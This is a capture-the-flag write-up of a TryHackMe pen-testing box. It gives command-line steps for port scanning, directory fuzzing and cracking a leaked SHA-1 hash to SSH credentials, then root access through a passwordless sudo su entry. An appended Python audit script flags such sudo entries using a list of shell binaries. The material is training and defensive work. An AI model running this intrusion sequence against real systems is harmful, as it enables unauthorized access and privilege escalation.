Kamil Gierach-Pacanek
CyberEthical.Me: Hacking for the Security Awareness

THM: Crash Course Pen Testing

Write-up for final challenge at CC: Pen Testing room at TryHackMe

Published on Sep 13, 2021

Basic Information

Type: Regular Box
Name: Try Hack Me / CC: Pen Testing
Author: Asentinn / OkabeRintaro



Target IP is - I'm assigning that to the variable for ease of use.

$ IP=

Scanning for open ports

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out


Then prepare the XML input for searchsploit

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-


Firing up nikto and ffuf for practice

$ nikto -h $IP -o nikto-$IP.txt


$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md

The ffuf command can be a little complicated, so let me explain it a bit:

  • -w: wordlist for fuzzing
  • -u: target URL
  • -recursion, -recursion-depth: when ffuf finds a directory, it starts another scan of it after the current one has finished (you will recognize it by the Job [1/X] label)
  • -e: a useful one; it also looks for files with the listed extensions. Be careful with it though, as it multiplies the amount of work by N, where N is the number of extensions (because each extension is appended to every wordlist entry).
  • -v: shows the full URL of the findings (useful when using the -recursion flag)
  • -of: output format; ffuf output files are not the easiest to read, and I chose Markdown for now
  • -o: the name of the output file; the shell expands the $IP variable in the resulting file name


Cracking user password

Both tools found the /secret/ directory, and ffuf additionally tracked down /secret/secret.txt.

$ curl


This is definitely the hash of the user's password. I will be using john to crack it, and it could be run blindly on that file, but let's first use the hash-identifier that comes with Kali to see its output, just out of curiosity.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8


As we can see, it is a SHA-1 hash. Now cracking it with john:

$ john -format=Raw-SHA1 secret.txt


That was really fast (don't ever use such weak passwords, of course). So we've got the credentials nyan/nyan. Let's try logging in with these over SSH.

$ ssh nyan@$IP


We're in. I'm getting the user flag.

nyan@ubuntu:~$ cat user.txt

Elevating privileges


User nyan can run /bin/su as root without specifying a password.

And just by seeing this sudoers entry we know that nyan can execute the sudo command.

Otherwise, when running sudo -l, we would see: Sorry, user nyan may not run sudo on ubuntu (where ubuntu is the host name).

We got root! So cat out that flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt
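
The sudoers entry above, seen from the administrator's side: a small audit that reads `sudo -l` output and flags passwordless entries that amount to a root shell. This is an added example, not part of the original write-up; the sample output is constructed, and the SHELL_EQUIVALENT list and the severity labels are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Constructed sample of `sudo -l` output, modelled on the entry described above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
    (root) /usr/bin/apt-get update
"""

# Assumption: a short illustrative list of commands that hand the caller a
# full shell as the run-as user; a real audit would use a reviewed list.
SHELL_EQUIVALENT = {"ALL", "su", "sh", "bash", "dash", "zsh"}

# One privilege line: "(runas) [TAG: ...] command[, command...]"
ENTRY = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

@dataclass
class Finding:
    runas: str
    command: str
    nopasswd: bool
    severity: str  # labels are this example's own scale

def audit_sudo_l(text):
    """Return one Finding per command listed in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # headers, Defaults, and the "Sorry, user ..." refusal
        users = m["runas"].split(":")[0].replace(" ", "").split(",")
        as_root = any(u in ("root", "ALL") for u in users)
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",") if c.strip()):
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            severity = "info"
            if as_root and binary in SHELL_EQUIVALENT:
                severity = "critical" if nopasswd else "high"
            elif as_root and nopasswd:
                severity = "review"
            findings.append(Finding(m["runas"], cmd, nopasswd, severity))
    return findings
if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{f.severity:8} ({f.runas}) {f.command}")
```

On the sample, the /bin/su line is reported as critical and the password-protected apt-get line as info; the refusal message quoted earlier yields no findings.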
